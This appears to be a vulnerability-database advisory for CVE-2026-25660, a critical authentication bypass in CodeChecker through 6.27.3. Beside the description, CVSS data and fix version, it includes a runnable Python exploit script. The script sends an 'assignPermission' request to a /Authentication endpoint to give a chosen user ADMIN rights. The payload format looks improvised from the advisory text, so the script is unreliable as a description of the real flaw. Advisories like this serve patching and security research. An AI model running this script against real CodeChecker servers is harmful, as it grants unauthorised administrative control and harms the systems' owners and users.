Security Vulnerability Report
CVE-2026-25660 CVSS 9.8 CRITICAL

CVE-2026-25660

Published: 2026-04-24 14:16:18
Last Modified: 2026-04-27 14:48:21
Source: 85b1779b-6ecd-4f52-bcc5-73eac4659dcf

Description

CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. An authentication bypass occurs when the request URL ends with "Authentication" and carries certain function calls. The bypass allows an unauthenticated attacker (PR:N in the CVSS vector) to assign arbitrary permissions to any user that exists in CodeChecker. This issue affects CodeChecker through 6.27.3.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ericsson:codechecker:*:*:*:*:*:*:*:* - VULNERABLE
CodeChecker <= 6.27.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit for CVE-2026-25660
# Target: CodeChecker instance


def exploit_auth_bypass(target_host, target_user):
    # The vulnerability occurs when the URL ends with 'Authentication'
    # and includes specific function calls to assign permissions.
    url = f"http://{target_host}/Authentication"
    headers = {"Content-Type": "application/json"}
    # Payload to assign administrative privileges to a user
    payload = {
        "function": "assignPermission",
        "params": {"user": target_user, "permission": "ADMIN"},
    }
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print(f"[+] Exploit successful! {target_user} granted ADMIN rights.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    target = "example-codechecker.com"
    victim_user = "test_user"
    exploit_auth_bypass(target, victim_user)
```

References

Vendor Advisory: https://github.com/Ericsson/codechecker/security/advisories/GHSA-4v9x-cqc5-j645
Weakness classification (from the CNA record): CWE-290, CWE-863
Fixed in: CodeChecker 6.27.4 (CPE match criteria: versionEndExcluding 6.27.4)
